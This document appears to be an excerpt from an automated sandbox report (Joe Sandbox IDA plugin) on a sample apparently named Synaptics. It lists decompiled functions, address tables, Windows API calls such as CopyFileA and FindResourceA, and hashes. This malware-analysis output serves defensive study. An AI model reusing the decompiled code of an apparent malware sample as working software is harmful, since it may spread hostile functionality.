                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410A04 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E00410A04(intOrPtr _a4, signed int* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				char* _v12;
				char _v28;
				void* __ebp;
				signed int _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t54;
				signed int* _t56;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t71 = _t73;
				_t74 = _t73 + 0xffffffe8;
				_t56 = _a8;
				if( *_t56 != 0x400c) {
					__eflags = _a4;
					if(_a4 != 0) {
						_push( &_v28);
						L0040F318();
						_v12 =  &_v28;
					} else {
						_v12 = 0;
					}
					_push(_t71);
					_push(0x410af8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t74;
					_t68 =  *_t56;
					_t27 =  *_t56 & 0x0000ffff;
					__eflags = _t27 - 0x101;
					if(__eflags > 0) {
						_t28 = _t27 - 0x4009;
						__eflags = _t28;
						if(_t28 == 0) {
							goto L12;
						} else {
							__eflags = _t28 != 4;
							if(_t28 != 4) {
								goto L14;
							} else {
								goto L12;
							}
						}
					} else {
						if(__eflags == 0) {
							L12:
							__eflags =  *0x49e810;
							if( *0x49e810 != 0) {
								 *0x49e810(_v12, _t56, _a12,  &_a16); // executed
							}
						} else {
							_t47 = _t27 - 9;
							__eflags = _t47;
							if(_t47 == 0) {
								goto L12;
							} else {
								__eflags = _t47 == 4;
								if(_t47 == 4) {
									goto L12;
								} else {
									L14:
									_t41 = E0041713C(_t68,  &_v8);
									__eflags = _t41;
									if(_t41 == 0) {
										E0041024C(_t59);
									} else {
										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
									}
								}
							}
						}
					}
					__eflags = 0;
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00410AFF);
					__eflags = _v12;
					if(_v12 != 0) {
						E00410E14(_a4, _v12);
						return E004109E8( &_v28);
					}
					return 0;
				} else {
					_t54 = E00410A04(_a4, _t56[2], _a12, _a16);
					return _t54;
				}
			}


















                                                                                                                                                                                          0x00410a05
                                                                                                                                                                                          0x00410a07
                                                                                                                                                                                          0x00410a0c
                                                                                                                                                                                          0x00410a14
                                                                                                                                                                                          0x00410a33
                                                                                                                                                                                          0x00410a37
                                                                                                                                                                                          0x00410a43
                                                                                                                                                                                          0x00410a44
                                                                                                                                                                                          0x00410a4c
                                                                                                                                                                                          0x00410a39
                                                                                                                                                                                          0x00410a3b
                                                                                                                                                                                          0x00410a3b
                                                                                                                                                                                          0x00410a51
                                                                                                                                                                                          0x00410a52
                                                                                                                                                                                          0x00410a57
                                                                                                                                                                                          0x00410a5a
                                                                                                                                                                                          0x00410a5d
                                                                                                                                                                                          0x00410a60
                                                                                                                                                                                          0x00410a63
                                                                                                                                                                                          0x00410a68
                                                                                                                                                                                          0x00410a78
                                                                                                                                                                                          0x00410a78
                                                                                                                                                                                          0x00410a7d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410a7f
                                                                                                                                                                                          0x00410a7f
                                                                                                                                                                                          0x00410a82
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410a82
                                                                                                                                                                                          0x00410a6a
                                                                                                                                                                                          0x00410a6a
                                                                                                                                                                                          0x00410a84
                                                                                                                                                                                          0x00410a84
                                                                                                                                                                                          0x00410a8b
                                                                                                                                                                                          0x00410a9a
                                                                                                                                                                                          0x00410aa0
                                                                                                                                                                                          0x00410a6c
                                                                                                                                                                                          0x00410a6c
                                                                                                                                                                                          0x00410a6c
                                                                                                                                                                                          0x00410a6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410a71
                                                                                                                                                                                          0x00410a71
                                                                                                                                                                                          0x00410a74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410a76
                                                                                                                                                                                          0x00410aa5
                                                                                                                                                                                          0x00410aaa
                                                                                                                                                                                          0x00410aaf
                                                                                                                                                                                          0x00410ab1
                                                                                                                                                                                          0x00410aca
                                                                                                                                                                                          0x00410ab3
                                                                                                                                                                                          0x00410ac5
                                                                                                                                                                                          0x00410ac5
                                                                                                                                                                                          0x00410ab1
                                                                                                                                                                                          0x00410a74
                                                                                                                                                                                          0x00410a6f
                                                                                                                                                                                          0x00410a6a
                                                                                                                                                                                          0x00410acf
                                                                                                                                                                                          0x00410ad1
                                                                                                                                                                                          0x00410ad4
                                                                                                                                                                                          0x00410ad7
                                                                                                                                                                                          0x00410adc
                                                                                                                                                                                          0x00410ae0
                                                                                                                                                                                          0x00410aea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410af2
                                                                                                                                                                                          0x00410af7
                                                                                                                                                                                          0x00410a16
                                                                                                                                                                                          0x00410a26
                                                                                                                                                                                          0x00410b04
                                                                                                                                                                                          0x00410b04

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                          • Opcode ID: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                          • Instruction ID: 827efc6faae8abaedf60253a3c6b5d70b674294039054989f6423f3ec82ecb16
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB314A71A04308AFDB20DFA8C985AEE77A8EF18390F544467F904D3241D7B89DD0C7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004747D8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                          			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* __ecx;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HRSRC__* _t13;
				void* _t29;
				intOrPtr* _t33;
				struct HINSTANCE__* _t37;
				void* _t38;
				intOrPtr _t41;
				void* _t48;
				intOrPtr _t51;

				_t48 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t51);
				_push(0x474878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_t11 = E00404E80(_v8);
				_t12 =  *0x49e668; // 0x400000
				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
				if(_t13 == 0) {
					E00404A14(_t48, 0x47488c);
				} else {
					_t37 =  *0x49e668; // 0x400000
					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
					_push( *((intOrPtr*)( *_t33))());
					_t29 = E00404ED8(_t48);
					_pop(_t38);
					E0041D8CC(_t33, _t38, _t29);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E0047487F);
				return E004049C0( &_v8);
			}















                                                                                                                                                                                          0x004747de
                                                                                                                                                                                          0x004747e0
                                                                                                                                                                                          0x004747e6
                                                                                                                                                                                          0x004747ed
                                                                                                                                                                                          0x004747ee
                                                                                                                                                                                          0x004747f3
                                                                                                                                                                                          0x004747f6
                                                                                                                                                                                          0x004747fe
                                                                                                                                                                                          0x00474804
                                                                                                                                                                                          0x0047480a
                                                                                                                                                                                          0x00474811
                                                                                                                                                                                          0x0047485d
                                                                                                                                                                                          0x00474813
                                                                                                                                                                                          0x00474819
                                                                                                                                                                                          0x0047482b
                                                                                                                                                                                          0x00474837
                                                                                                                                                                                          0x00474842
                                                                                                                                                                                          0x00474845
                                                                                                                                                                                          0x0047484e
                                                                                                                                                                                          0x0047484f
                                                                                                                                                                                          0x0047484f
                                                                                                                                                                                          0x00474864
                                                                                                                                                                                          0x00474867
                                                                                                                                                                                          0x0047486a
                                                                                                                                                                                          0x00474877

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1635176832-0
                                                                                                                                                                                          • Opcode ID: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                          • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00473804 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _t51;
				void* _t56;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t56 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t59);
				_push(0x4738af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59 + 0xfffffff0;
				if(E00409A48(_v12, _t61) != 0) {
					E00404BB8( &_v16, E00404E80(_v12));
					E00409A90(_v16, 0x80);
				}
				_t44 = E00404E80(_v12);
				CopyFileA(E00404E80(_v8), _t25, 0); // executed
				E00404BB8( &_v20, _t44);
				E00409A90(_v20, _t56);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E004738B6);
				return E004049E4( &_v20, 4);
			}











                                                                                                                                                                                          0x00473804
                                                                                                                                                                                          0x0047380e
                                                                                                                                                                                          0x00473811
                                                                                                                                                                                          0x00473814
                                                                                                                                                                                          0x00473816
                                                                                                                                                                                          0x00473819
                                                                                                                                                                                          0x0047381f
                                                                                                                                                                                          0x00473827
                                                                                                                                                                                          0x0047382e
                                                                                                                                                                                          0x0047382f
                                                                                                                                                                                          0x00473834
                                                                                                                                                                                          0x00473837
                                                                                                                                                                                          0x00473844
                                                                                                                                                                                          0x00473853
                                                                                                                                                                                          0x00473860
                                                                                                                                                                                          0x00473860
                                                                                                                                                                                          0x0047386f
                                                                                                                                                                                          0x0047387b
                                                                                                                                                                                          0x00473885
                                                                                                                                                                                          0x0047388f
                                                                                                                                                                                          0x00473896
                                                                                                                                                                                          0x00473899
                                                                                                                                                                                          0x0047389c
                                                                                                                                                                                          0x004738ae

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                                                                                                                                                            • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                            • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCopyErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2414470624-0
                                                                                                                                                                                          • Opcode ID: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                          • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047D26C Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E0047D26C(intOrPtr* __eax, void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, signed int* _a4, intOrPtr _a8) {
				char _v8;
				void* _v20;
				intOrPtr _v22;
				signed short _v24;
				char _v28;
				intOrPtr* _t18;
				intOrPtr* _t29;
				intOrPtr* _t38;
				intOrPtr _t49;
				signed int* _t51;
				void* _t54;
				void* _t56;

				_v28 = 0;
				_t51 = __ecx;
				_t38 = __eax;
				 *[fs:eax] = _t56 + 0xffffffe8;
				_v8 = 0x10;
				_t18 =  *0x49d75c; // 0x49ecd8
				 *((intOrPtr*)( *_t18))(__edx,  &_v24,  &_v8,  *[fs:eax], 0x47d2fa, _t56, __edi, __esi, __ebx, _t54); // executed
				E0047BCA8();
				 *_t51 = _v24 & 0x0000ffff;
				 *((intOrPtr*)( *_t38 + 0x7c))();
				E00404A14(_a8, _v28);
				_t29 =  *0x49d988; // 0x49ecf8
				 *_a4 =  *((intOrPtr*)( *_t29))(_v22) & 0x0000ffff;
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x47d301);
				return E004049C0( &_v28);
			}















                                                                                                                                                                                          0x0047d277
                                                                                                                                                                                          0x0047d27a
                                                                                                                                                                                          0x0047d27e
                                                                                                                                                                                          0x0047d28b
                                                                                                                                                                                          0x0047d28e
                                                                                                                                                                                          0x0047d29e
                                                                                                                                                                                          0x0047d2a5
                                                                                                                                                                                          0x0047d2ab
                                                                                                                                                                                          0x0047d2b4
                                                                                                                                                                                          0x0047d2c0
                                                                                                                                                                                          0x0047d2c9
                                                                                                                                                                                          0x0047d2d3
                                                                                                                                                                                          0x0047d2e2
                                                                                                                                                                                          0x0047d2e6
                                                                                                                                                                                          0x0047d2e9
                                                                                                                                                                                          0x0047d2ec
                                                                                                                                                                                          0x0047d2f9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • getsockname.WS2_32(?,?,00000010,00000000,0047D2FA), ref: 0047D2A5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: getsockname
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3358416759-0
                                                                                                                                                                                          • Opcode ID: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                          • Instruction ID: 8a280b85d509fd19767874a1b7a6a98121d32f32e710f6eeb76a30564a751db0
                                                                                                                                                                                          • Opcode Fuzzy Hash: f967102204f6f4aed3aeaf4e47652de67eb898ed1214602bbb5051f58e7d0b15
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA111CB5A102099FC700DFA9D8819AAB7F8EB8D710B508576B904E3350EA349D04CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x41a897);
					return E00403BEC(_v8);
				}
			}


















                                                                                                                                                                                          0x0041a81d
                                                                                                                                                                                          0x0041a81f
                                                                                                                                                                                          0x0041a823
                                                                                                                                                                                          0x0041a825
                                                                                                                                                                                          0x0041a827
                                                                                                                                                                                          0x0041a82b
                                                                                                                                                                                          0x0041a82d
                                                                                                                                                                                          0x0041a82d
                                                                                                                                                                                          0x0041a845
                                                                                                                                                                                          0x0041a848
                                                                                                                                                                                          0x0041a84a
                                                                                                                                                                                          0x0041a89e
                                                                                                                                                                                          0x0041a84c
                                                                                                                                                                                          0x0041a85d
                                                                                                                                                                                          0x0041a862
                                                                                                                                                                                          0x0041a863
                                                                                                                                                                                          0x0041a868
                                                                                                                                                                                          0x0041a86b
                                                                                                                                                                                          0x0041a873
                                                                                                                                                                                          0x0041a878
                                                                                                                                                                                          0x0041a87c
                                                                                                                                                                                          0x0041a87f
                                                                                                                                                                                          0x0041a882
                                                                                                                                                                                          0x0041a88f
                                                                                                                                                                                          0x0041a88f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FindResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1635176832-0
                                                                                                                                                                                          • Opcode ID: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                          • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab9e2e2e5987fb8538000ef7ea5255ae4d2481a6a9c4e282ae103432873fbd2f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                                                                                                                                                          0x00407aeb
                                                                                                                                                                                          0x00407af0
                                                                                                                                                                                          0x00407af2
                                                                                                                                                                                          0x00407b21
                                                                                                                                                                                          0x00407b2a
                                                                                                                                                                                          0x00407b36

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                          • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                          • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C918 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040C918(long __eax, void* __edx) {
				char _v260;
				long _t6;
				void* _t9;
				void* _t16;
				void* _t18;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v260, 0x100, 0); // executed
				while(_t6 > 0) {
					_t16 =  *((intOrPtr*)(_t18 + _t6 - 1)) - 0x21;
					if(_t16 < 0 || _t16 == 0xd) {
						_t6 = _t6 - 1;
						continue;
					}
					break;
				}
				return E00404AB0(_t9, _t6, _t18);
			}








                                                                                                                                                                                          0x0040c91f
                                                                                                                                                                                          0x0040c937
                                                                                                                                                                                          0x0040c93f
                                                                                                                                                                                          0x0040c947
                                                                                                                                                                                          0x0040c94a
                                                                                                                                                                                          0x0040c93e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c93e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c94a
                                                                                                                                                                                          0x0040c962

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FormatMessage
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1306739567-0
                                                                                                                                                                                          • Opcode ID: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                          • Instruction ID: 84e049c2e5adfe6bfcf788a8d77e6067e1cf108f27a381f6f91ce7570d17270d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E0D8B178830155F22512644CC7BBA62494780704F10423636A0AA3E3DAEED44502DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00425A84 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x425ac4; // 0x3
				E00425D3C(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00404C80(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                                                                                                                                                                          0x00425a8b
                                                                                                                                                                                          0x00425a8d
                                                                                                                                                                                          0x00425a95
                                                                                                                                                                                          0x00425a9c
                                                                                                                                                                                          0x00425aa0
                                                                                                                                                                                          0x00425aa6
                                                                                                                                                                                          0x00425ab8
                                                                                                                                                                                          0x00425ac0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
